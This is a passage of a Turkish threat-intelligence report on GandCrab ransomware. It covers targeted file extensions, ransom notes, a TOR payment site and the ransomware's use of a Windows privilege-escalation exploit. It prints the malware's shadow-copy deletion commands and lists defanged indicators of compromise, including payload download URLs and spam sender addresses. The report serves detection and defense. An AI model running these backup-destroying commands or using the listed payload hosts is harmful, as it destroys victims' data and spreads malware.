.sdw .se .session .sgm .sig .skcard .sla .sla.gz .smf .sms .ssa .story .strings .stw .sty .sublime-project .sublime-workspace .sxg .sxw .tab .tab .tdf .tdf .template .tex .text .textclipping .thp .tlb .tm .tmd .tmdx .tmv .tmvx .tpc .trelby .tvj .txt .u3i .unauth .unx .uof .uot .upd .utf8 .utxt .vct .vnt .vw .wbk .webdoc .wn .wp .wp4 .wp5 .wp6 .wp7 .wpa .wpd .wpd .wpd .wpl .wps .wps .wpt .wpt .wpw .wri .wsd .wtt .wtx .xbdoc .xbplate .xdl .xdl .xwp .xwp .xwp .xy .xy3 .xyp .xyw
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
.zabw .zrtf .zw .ani .cab .cpl .cur .diagcab .diagpkg .dll .drv .lock .hlp .ldf .icl .icns .ico .ics .lnk .key .idx
.mod .mpa .msc .msp .msstyles .msu .nomedia .ocx .prf .rom .rtp .scr .shs .spl .sys .theme .themepack
.exe .bat .cmd .gandcrab .KRAB .CRAB .zerophage_i_like_your_pictures
Şifreleme işlemi sonrasında şifrelenen her klasörün içerisine fidye ödemesine dair detayların yer aldığı html ve txt dosyaları oluşturulmaktadır.
Görsel 75
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Fidye ödeme detaylarına ait görsel aşağıda yer almaktadır.
Görsel 76 Fidye ödeme detayları
hxxp://gandcrabmmfe6mnef[.]onion/7e410eb420c50d73 TOR ağı adresinden fidye ödemesi yapılmasına yönelik yönergeler yer almaktadır.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
İlgili TOR adresine girildiğinde aşağıdaki ekran ile karşılaşılmaktadır.
Görsel 77 GandCrab tor adresi
Gandcrab, tüm işlemleri bitirdikten sonra enfekte cihaza ait shadowcopy bilgilerini silmektedir. Farklı samplelar incelendiğinde bu işlemin iki farklı şekilde yapıldığı görülmüştür.
\wbem\wmic.exe shadowcopy delete \cmd.exe c/ vssadmin delete shadows /all /quiet
Görsel 78 Shadowcopy’nin silinme aşaması.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Yukarıdaki görselde yer alan işlemlerin gerçekleştirilmesine ait kod parçasına aşağıdaki görselde yer verilmiştir.
v5.0.0 üzerinde yapılan incelemeler sırasında GandCrab’in CVE-2018–8440 numaralı ALPC Task Scheduler Local Privilege Exploit’ini kullandığı tespit edilmiştir. İlgili exploit’in zararlı içerisinde kullanıldığı yere dair görsellere aşağıda yer verilmiştir.
Görsel 79 ALPC Task Scheduler Local Privilege Exploitinin kullanıldığı yer.
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Yapılan araştırmalar sonucunda ilgili exploit koduna ait kaynak koda erişilmiştir.
Görsel 80 ALPC Task Scheduler Local Privilege Exploitinin kullanıldığı yer.
İlgili exploit’e ait fonksiyonun decompile edilmiş hali aşağıdaki gibidir.
Görsel 81 Exploit fonksiyonuna ait kod parçası
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
Exploit’e ait kaynak kodlardan bir bölüme aşağıda yer verilmiştir.
Görsel 82 Exploite ait kaynak kodunun bir bölümü.
3) Tehdit Vektörü Göstergeleri (Indicator of Compromises)
a) GandCrab v5.0 Yara kuralı
b) ALPC LPE Exlploit Yara Kuralı
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
c) Spam Mail Adresleri
S.N. E-Posta Adresi
1 Teddy Bailey <[email protected]>
2 Imogene Carter <[email protected]>
3 Imelda Jones <[email protected]>
4 Ted Hall <[email protected]>
5 Deanne Harris <[email protected]>
6 Bob Ross <[email protected]>
7 Teddy Gonzalez <[email protected]>
8 Bradford Reed <[email protected]>
9 Taylor Phillips <[email protected]>
10 Deena Hernandez <[email protected]>
11 Brandon Clay <[email protected]>
12 Carmen Cresswell <[email protected]>
13 Fredric Elvy <[email protected]>
14 Mayra Mulroney <[email protected]>
15 Maricela Audeley <[email protected]>
16 Megan Ilonka <[email protected]>
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
d) Zararlıların İletişime Geçtiği Domain Adresleri
S.N. Domain Adresi
1 dsdfgdfsdegdf[.]ru/20/_outputA19506FRR[.]exe
2 104[.]248[.]163[.]221/lole[.]exe
3 104[.]248[.]163[.]221/tor[.]exe
4 209[.]141[.]56[.]224/youwin[.]exe
5 arcnyc[.]com/youwin[.]exe
6 bats[.]pw/putty[.]exe
7 cmdou[.]com/34wt5ydh45syrth/q3w4ts5/5yedthfvghbj[.]exe
8 karbonkoko[.]com/rundll[.]exe
9 debzaccholkonsult[.]com/rundll[.]exe
10 googletime[.]ac[.]ug/3/_output7A67C50ar[.]exe
11 sicurezza-postepay[.]club/man[.]exe
12 sicurezza-postepay[.]info/man[.]exe
13 sicurezza-postepay[.]pw/man[.]exe
14 sicurezza-postepay[.]site/man[.]exe
15 sicurezza-postepay[.]space/man[.]exe
16 sicurezza-postepay[.]xyz/man[.]exe
17 sicurezza-postepay[.]club/invoice[.]php
18 sicurezza-postepay[.]info/invoice[.]php
19 sicurezza-postepay[.]pw/invoice[.]php
20 sicurezza-postepay[.]site/invoice[.]php
21 sicurezza-postepay[.]space/invoice[.]php
22 sicurezza-postepay[.]xyz/invoice[.]php
23 104[.]248[.]163[.]221/invoice[.]php
24 hmrc-tax[.]xyz/invoice[.]php
25 hmrc-tax[.]xyz/man[.]exe
26 www[.]kakaocorp[.]link/
27 www[.]kakaocorp[.]link/content/images/thrukedaes[.]jpg
28 104[.]244[.]74[.]55/tomandjerry[.]exe
29 92[.]63[.]197[.]153/mcdonalds[.]exe
30 92[.]63[.]197[.]153/s/1[.]exe
31 92[.]63[.]197[.]153/s/2[.]exe
32 92[.]63[.]197[.]153/s/3[.]exe
33 92[.]63[.]197[.]153/s/4[.]exe
34 92[.]63[.]197[.]153/s/5[.]exe
35 checkerrors[.]ug[.]/payload[.]ps1
36 checkerrors[.]ug/gategate[.]php
37 91[.]210[.]104[.]247/update[.]bin
38 ezstat[.]ru/1Rn937
39 www[.]billerimpex[[.]]com
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
40 www[.]macartegrise[.]eu
41 www[.]poketeg[.]com
42 perovaphoto[.]ru
43 asl-company[.]ru
44 www[.]fabbfoundation[.]gm
45 www[.]perfectfunnelblueprint[.]com
46 www[.]wash-wear[.]com
47 pp-panda74[.]ru
48 cevent[.]net
49 bellytobabyphotographyseattle[.]com
50 alem[.]be
51 boatshowradio[.]com
52 dna-cp[.]com
53 acbt[.]fr
54 wpakademi[.]com
55 www[.]cakav[.]hu
56 www[.]mimid[.]cz
57 6chen[.]cn
58 goodapd[.]website
59 oceanlinen[.]com
60 tommarmores[.]com[.]br
61 nesten[.]dk
62 zaeba[.]co[.]uk
63 www[.]n2plus[.]co[.]th
64 koloritplus[.]ru
65 h5s[.]vn
66 marketisleri[.]com
67 www[.]toflyaviacao[.]com[.]br
68 www[.]rment[.]in
69 www[.]lagouttedelixir[.]com
70 www[.]krishnagrp[.]com
71 big-game-fishing-croatia[.]hr
72 mauricionacif[.]com
73 www[.]ismcrossconnect[.]com
74 aurumwedding[.]ru
75 test[.]theveeview[.]com
76 relectrica[.]com[.]mx
77 bethel[.]com[.]ve
78 vjccons[.]com[.]vn
79 bloghalm[.]eu
80 cyclevegas[.]com
81 royal[.]by
82 www[.]himmerlandgolf[.]dk
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
83 hoteltravel2018[.]com
84 picusglancus[.]pl
85 unnatimotors[.]in
86 krasnaypolyana123[.]ru
87 smbardoli[.]org
88 blokefeed[.]club
89 evotech[.]lu
90 devdev[.]com[.]br
91 graftedinn[.]us
92 top-22[.]ru
93 simetribilisim[.]com
94 sherouk[.]com
95 lucides[.]co[.]uk
96 hanaglobalholding[.]com
97 diadelorgasmo[.]cl
98 www[.]groupwine[.]fr
99 mrngreens[.]com
100 www[.]cognitiasystems[.]com
101 canhoopalcity[.]top
102 greatmiddleeastgate[.]com
103 xn — 80adsn2ag7e[.]xn — p1ai
104 www[.]reusa[.]com[.]br
105 xn — 80avc1e[.]xn — p1acf
106 www[.]christinapetrou[.]co[.]uk
107 www[.]lyonwood[.]co[.]uk
108 www[.]urstoothfully[.]com
109 faculdadesenacpe[.]edu[.]br
110 dijitalharf[.]com
111 www[.]maraeeventos[.]com[.]br
112 www[.]chanandeayrs[.]com
113 idclamart[.]fr
114 www[.]batisigortaaydin[.]com
115 muxtay[.]com
116 kubatom[.]com
117 sweetthirty[.]pl
118 onstaheerd[.]nl
119 kakaocorp[.]link
120 jamgonkongtrul[.]org[.]tw
121 barbochos[.]com
122 rayanaco[.]ir
123 obed-service[.]ru
124 500flats[.]com
125 www[.]lasertag[.]kiev[.]ua
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
126 gstelecom[.]cf
127 www[.]ikebana[.]cat
128 gites-les-noisetiers[.]fr
129 www[.]kia1[.]ir
130 m-award[.]com
131 intervener[.]org
132 sxhfhr[.]ga
133 soldiergym[.]nl
134 fitforms[.]mx
135 www[.]cornishinn[.]com
136 riib[.]com[.]pl
137 evaskinclinic[.]com
138 www[.]kuntoaskel[.]net
139 ecart[.]nu
140 www[.]phammemviet[.]com
141 www[.]clarusdent[.]com
142 www[.]lasthotel[.]it
143 www[.]htsinteriors[.]com
144 kwanho[.]com[.]au
145 importec[.]com[.]mx
146 www[.]xn — narmdnsalonlar-fjb55aa34dpkdo[.]com
147 klongpleng[.]com
148 cocnguyetsanthaomeo[.]com
149 wakeupwithmakeup[.]co[.]uk
150 www[.]jtaobk[.]com
151 mundololita[.]es
152 denaseguridad[.]com
153 inescogroup[.]com
154 www[.]velvet[.]travel
155 myartstudio[.]com[.]my
156 www[.]financetoit[.]fr
157 sigillum[.]com[.]ua
158 www[.]friends-for-kids[.]de
159 www[.]pgregoire[.]com
160 babiceresa[.]com
161 vinhomescangio[.]viethomes[.]land
162 heartsongroup[.]com
163 top-prodazha[.]ru
164 kalemon[.]net
165 www[.]tikura[.]com[.]br
166 www[.]riadtroiscours[.]com
167 videirafilho[.]com[.]br
168 vtr[.]kz
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
169 peritocaligrafosevilla[.]es
170 umrezamani[.]net
171 www[.]bsecure[.]fr
172 www[.]setiri[.]com
173 www[.]fondsbn[.]com
174 optikchrtek[.]yourcloud[.]cz
175 www[.]sva-co[.]ir
176 www[.]classtransport[.]fr
177 pearlandshandyman[.]com
178 toponlinegames[.]pro
179 www[.]interiorideas9[.]com
180 www[.]cyrillecharro[.]com
181 www[.]romanjews[.]com
182 alatkeselamatankerja[.]co
183 mcsiweb[.]com
184 www[.]monei[.]co
185 www[.]conversants[.]com
186 pro-markservicesinc[.]com
187 thtcannabis[.]com
188 novocentropetrolina[.]com
189 bharatfolks[.]com
190 www[.]cheriehavetoshine[.]com
191 www[.]ossainicholasossai[.]com
192 www[.]sgfcomputers[.]ro
193 sinuverde[.]com
194 www[.]senteks[.]com
195 www[.]megawheyprotein[.]com
196 www[.]speardigitalweb[.]com
197 www[.]101[.]sr
198 dutchtraditions[.]nl
199 barvybud[.]com
200 thillaikalavathi[.]info
201 parsmoviez[.]com
202 ogenconsult[.]com
203 mdc-coaching[.]fr
204 finamlight[.]ru
205 atayastore[.]com
206 www[.]thatscomfortable[.]com
207 www[.]colorshotevents[.]com
208 ananas[.]kiev[.]ua
209 www[.]bitwiseacademy[.]com
210 sbobetcasinoterpercaya[.]com
211 upm-apply[.]com
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
212 carillon7tanphu[.]com
213 gofootball24h[.]com
214 miriamkapner[.]com
215 onedev[.]ro
216 www[.]alanya[.]co[.]uk
217 unitedctg[.]com
218 ioae[.]com[.]vn
219 startcomputer[.]com[.]br
220 aldrovanaluxe[.]lviv[.]ua
221 meblivdim[.]org
222 www[.]transento[.]com
223 www[.]parthabarua[.]com
224 rbctoken[.]com
225 sonnewton[.]com
226 www[.]santischerd[.]com
227 0123porno[.]com
228 5[.]77[.]60[.]222
229 180[.]211[.]99[.]165
230 aldirgayrimenkul[.]com
231 103[.]253[.]1[.]219
232 abidhandicraft[.]com
233 androsoft[.]in
234 128[.]199[.]96[.]238
235 argedalatpars[.]ir
236 179[.]188[.]17[.]9
237 basketkids[.]com[.]ua
238 avangardstone[.]com
239 autumnnight[.]cz
240 alauddintakeaway[.]com
241 androturk[.]club
242 badmos[.]top
243 barquestest9[.]uk
244 boucherie[.]lemarchefrais[.]com
245 baranacarpet[.]com
246 anowaragroupbd[.]com
247 blog[.]betzest[.]com
248 anvatbinhduong[.]com
249 bmafrique[.]com
250 amardin[.]com
251 airybd[.]com
252 cadretoiles[.]com
253 awrbloooomdevserver[.]com
254 bluebellhdb[.]com
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
255 ce-clp[.]fr
256 charm[.]andreea[.]alexandroni[.]ro
257 atlantisbuildcon[.]com
258 blog[.]raztype[.]com
259 chatrashow[.]com
260 blog[.]swingtaiwan[.]com
261 call4soft[.]com
262 bloomingrosebd[.]com
263 bhbeautyempire[.]com
264 acasadocarro[.]com[.]br
265 casualflirtings[.]com
266 blog[.]damngood[.]mx
267 carlylevanlines[.]com
268 conexa[.]no
269 cashback[.]ncplinc[.]net
270 creditmarketplace[.]eu
271 brightenceiling[.]com[.]hk
272 asiapointpl[.]com
273 cityclosetselfstorage[.]com
274 customroms[.]cba[.]pl
275 daoudi-services[.]com
276 cleartripcustomercare[.]com
277 dejting[.]party
278 coreserv[.]pixelsco[.]com
279 dneprsemena[.]com
280 azulproducciones[.]com[.]gt
281 drummelo[.]altervista[.]org
282 danialent[.]com
283 deneme2[.]bokshaber[.]net
284 bdot[.]co[.]kr
285 efacile[.]biz
286 dymoetiketler[.]com
287 dev[.]beverlywilshiremedical[.]com
288 electrobox[.]org
289 e-przepisy[.]cba[.]pl
290 doktergigimuda[.]com
291 dsc[.]integralmea[.]info
292 envirobostad[.]se
293 establecimientos[.]sintinovoy[.]sevapp20[.]com
294 doglabs[.]com[.]br
295 eyh[.]org[.]tr
296 conthoi[.]ga
297 enestar[.]es
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
298 aistockpick[.]com
299 farynskiprzemek[.]cba[.]pl
300 ethrx[.]org
301 emilyshope[.]org
302 103[.]254[.]113[.]170
303 eye-doctor[.]mobi
304 freespiritgroup[.]altervista[.]org
305 cnctechservicos[.]com[.]br
306 flows[.]mobi
307 dogcatpetshop[.]life
308 gabinetszott[.]cba[.]pl
309 gianlucafiorino1[.]altervista[.]org
310 chinhung[.]info
311 eunos8[.]com
312 fotopsy[.]cba[.]pl
313 faraos[.]foco[.]cl
314 gmstroy[.]com
315 giargianes[.]altervista[.]org
316 flccgilumbria[.]it
317 francis-china[.]com
318 hariominteriordecorators[.]com
319 fertilidadpma[.]com
320 giftmaster[.]ml
321 goleelanau[.]com
322 ebsolute[.]com
323 grilledcheesereviews[.]com
324 getagriptraction[.]com
325 editoraplanmark[.]com[.]br
326 blog[.]ruichuangfagao[.]com
327 gypsysoulsonfire[.]com
328 datalystsystems[.]com
329 hourliapp[.]com
330 35[.]184[.]187[.]178
331 featherenterprising[.]com
332 interflower[.]ee
333 hownottocatchacold[.]com
334 irantbt[.]com
335 jak-sie-opalac[.]cba[.]pl
336 istanbul212tesisat[.]com
337 jeeping-ug[.]ru
338 aesimoveis[.]imb[.]br
339 jiletlitelmakinasi[.]com
340 kabiledans[.]com
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
341 hopcentury[.]com
342 gfj[.]adv[.]br
343 kameleon-restauracja[.]cba[.]pl
344 kaffekanna[.]no
345 kancelaria-crm[.]pl
346 informatica[.]uss[.]cl
347 harrisheatpumps[.]nz
348 kekti[.]com
349 homemingjiang[.]com
350 karatstreet[.]com
351 krdstud[.]ru
352 kmpoznan[.]cba[.]pl
353 hrd[.]gov[.]co
354 ijzsz[.]com
355 cqfsbj[.]cn
356 graminrajasthan[.]allappshere[.]in
357 harryfang[.]com
358 itsupplier[.]com[.]au
359 low-carb-rezept[.]com
360 cscig[.]ase[.]ro
361 lucianocellitancredi[.]com
362 lloyd[.]www[.]creative-platform[.]net
363 kinhmatgiao[.]com
364 khabardarexpress[.]com
365 kiemdinh345[.]com
366 imazineex[.]com
367 marbleentreprise[.]dk
368 bsp[.]co[.]id
369 klangplaza[.]com
370 marcora[.]it
371 masp[.]pro
372 ma-redactrice-web[.]com
373 kittipakdee[.]com
374 marmet[.]cba[.]pl
375 life[.]demobb[.]com
376 kssyn[.]com
377 meditec[.]ma
378 mellon[.]ir
379 mainlis[.]pt
380 maxibud[.]cba[.]pl
381 merittur[.]com
382 luatsuhaiduong[.]com
383 lgg[.]adv[.]br
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
384 mranalyz[.]com
385 moika[.]kg
386 muaithai[.]pl
387 jupiter[.]csit[.]rmit[.]edu[.]au
388 mugituz[.]com
389 modivi[.]hu
390 nahalbazr[.]com
391 lanxiaoyang[.]com
392 mengxiao7[.]com
393 mygembest[.]com
394 mskcontracting[.]ca
395 novosti-danasnje[.]info
396 mazjackson[.]com
397 grupoperfetto[.]com[.]br
398 ncrjobs[.]info
399 icebergillusion[.]com
400 nazareimoveis[.]vistatemporario[.]com[.]br
401 nilhair[.]com
402 oral[.]co[.]il
403 orthodontics[.]ir
404 ldm[.]littlerocknews[.]org
405 naizamdistributor[.]com
406 noahs-earth[.]com
407 openricostruzioneabruzzo[.]piattaforma[.]eu
408 oceanstockfilms[.]com
409 onlineitshop[.]com
410 naraveesurgerythailand[.]com
411 njrior[.]cn
412 peakmedia[.]se
413 haircb[.]com
414 nuzululmastah[.]com
415 nurfian[.]ukmforum[.]com
416 plataformacontralaprivatizaciondelcyii[.]org
417 ps-photo[.]ru
418 omahpoetih[.]com
419 paytrenkeren[.]xyz
420 ralienglish[.]com
421 phuongthaoland[.]com
422 nordestinasat[.]com[.]br
423 ratmfan[.]cba[.]pl
424 postit[.]angryventures[.]com
425 pittsburghbbq[.]com
426 saadetankaravekil[.]com
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
427 sahandnetcctv[.]com
428 shalvak[.]com
429 saids-edu[.]com
430 plasaponsel[.]com
431 shakingflames[.]com
432 shop[.]istest[.]ir
433 skutsje-gruttepier[.]nl
434 skbyd[.]cba[.]pl
435 sokolenko[.]dp[.]ua
436 protesesdeflex[.]com[.]br
437 saudigeriatrics[.]org
438 snejankagd[.]com
439 social[.]takeshopv[.]pp[.]ua
440 erikherrstrom[.]com
441 san-kelloff-italy[.]web5s[.]com
442 kuatsolar[.]kz
443 skilldealer[.]fr
444 lemdik[.]polri[.]go[.]id
445 studiodelcarratore[.]it
446 sportsohio[.]pbd-dev[.]com
447 megexinc[.]com
448 sinergiindonesia[.]co[.]id
449 smmakcreation[.]com
450 solardosing[.]ir
451 stoveworlddirect[.]co[.]uk
452 sinfonia[.]vn
453 tala[.]today
454 locnuockimnguyenphat[.]com[.]vn
455 test[.]assistia[.]se
456 test[.]indigo-experten[.]be
457 saberes[.]cl
458 test[.]mirari[.]pl
459 test[.]patemucevherat[.]com
460 thepinspire[.]co[.]uk
461 syjingermei[.]xyz
462 sulawan[.]com
463 torstenbygger[.]se
464 sites[.]blueskydigital[.]com[.]au
465 theaceexports[.]com
466 stivesofminthill[.]com
467 unicef-int[.]karibuni[.]be
468 uatwebsite[.]aithent[.]com
469 villagevanguard[.]co[.]uk
TASNİF DIŞI Zararlı Yazılım
Analiz Raporu
[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002
© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman
ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI
470 atelierdupain[.]it
471 violetdecor[.]net
472 vancouvereventvideo[.]com
473 vuraldirek[.]com
474 vlawcourse[.]com
475 white-power-music[.]cba[.]pl
476 worldgamifier[.]com
477 visahousebangladesh[.]com
478 wp[.]mmitest[.]fr
479 vietx[.]us
480 weihnachts-pyramide[.]tk
481 workcompoptions[.]com
482 wp[.]actions[.]men
483 webmarketing[.]cinfoway[.]in
484 ustunbey[.]com
485 whmhost[.]tk
486 voiceyouropinions[.]net
487 vipyouxi[.]net
488 www[.]armangarayan[.]com
489 mas-expert[.]com
490 vitoriainvest[.]com[.]br
491 www[.]consulpyme[.]biz
492 www[.]equi[.]nl
